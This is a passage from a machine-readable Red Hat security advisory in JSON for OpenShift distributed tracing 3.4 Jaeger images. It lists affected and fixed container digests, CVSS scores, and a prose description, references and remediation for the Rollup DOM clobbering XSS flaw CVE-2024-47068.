3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "vite: XSS via DOM Clobbering gadget found in vite bundled scripts" }, { "cve": "CVE-2024-47068", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2024-09-23T16:20:20.383320+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2314249" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Rollup module bundler for JavaScript. Certain versions are susceptible to a DOM Clobbering vulnerability when bundling scripts with properties from `import.meta` such as `import.meta.url` in the `cjs`/`umd`/`iife` format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements are present, for example, an `img` tag with an unsanitized `name` attribute.", "title": "Vulnerability description" }, { "category": "summary", "text": "rollup: DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS", "title": "Vulnerability summary" }, { "category": "other", "text": "This vulnerability is classified as moderate severity rather than important because it requires a specific and relatively uncommon attack vector to exploit\u2014namely, attacker-controlled scriptless HTML elements, such as an unsanitized name attribute in an img tag, which are typically less prevalent in well-maintained web applications. Additionally, the impact is limited to scenarios where import.meta is improperly handled in specific module formats (`cjs`, `umd`, `iife`), and the vulnerability can only lead to cross-site scripting (XSS) under specific conditions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-47068" }, { "category": "external", "summary": "RHBZ#2314249", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314249" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-47068", "url": "https://www.cve.org/CVERecord?id=CVE-2024-47068" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-47068", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47068" }, { "category": "external", "summary": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162", "url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162" }, { "category": "external", "summary": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185", "url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185" }, { "category": "external", "summary": "https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4", "url": "https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4" }, { "category": "external", "summary": "https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541", "url": "https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541" }, { "category": "external", "summary": "https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm", "url": "https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm" } ], "release_date": "2024-09-23T16:15:06.947000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-11T16:47:10+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10962" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 